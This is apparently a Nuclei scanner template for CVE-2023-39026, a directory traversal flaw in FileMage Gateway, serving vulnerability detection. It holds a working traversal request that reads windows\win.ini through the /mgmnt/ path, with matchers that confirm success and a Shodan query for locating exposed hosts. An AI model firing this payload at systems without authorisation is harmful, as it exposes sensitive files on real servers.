47 lines
2.0 KiB
YAML
47 lines
2.0 KiB
YAML
id: CVE-2023-39026
|
|
|
|
info:
|
|
name: FileMage Gateway - Directory Traversal
|
|
author: DhiyaneshDk
|
|
severity: high
|
|
description: |
|
|
Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.
|
|
impact: |
|
|
An attacker can view, modify, or delete sensitive files on the system, potentially leading to unauthorized access, data leakage, or system compromise.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in FileMage Gateway.
|
|
reference:
|
|
- https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html
|
|
- https://securityonline.info/cve-2023-39026-filemage-gateway-directory-traversal-vulnerability/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-39026
|
|
- https://www.filemage.io/docs/updates.html#change-log
|
|
- http://packetstormsecurity.com/files/174491/FileMage-Gateway-1.10.9-Local-File-Inclusion.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2023-39026
|
|
cwe-id: CWE-22
|
|
epss-score: 0.05678
|
|
epss-percentile: 0.9256
|
|
cpe: cpe:2.3:a:filemage:filemage:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: filemage
|
|
product: filemage
|
|
shodan-query: title:"FileMage"
|
|
tags: cve2023,cve,packetstorm,lfi,filemage
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "contains_all(body,'bit app support','extensions','fonts')"
|
|
- "contains(content_type, 'text/plain')"
|
|
- "status_code == 200"
|
|
condition: and
|
|
# digest: 4b0a00483046022100c8237ade5adc55459f68743aca2aa30e8aa8de98fcffff36262985d1038add45022100f003f17b5f16a43845084bc29f3bc6bbcc86845bb32e5df35fe9c65002dd2bf6:922c64590222798bb761d5b6d8e72950 |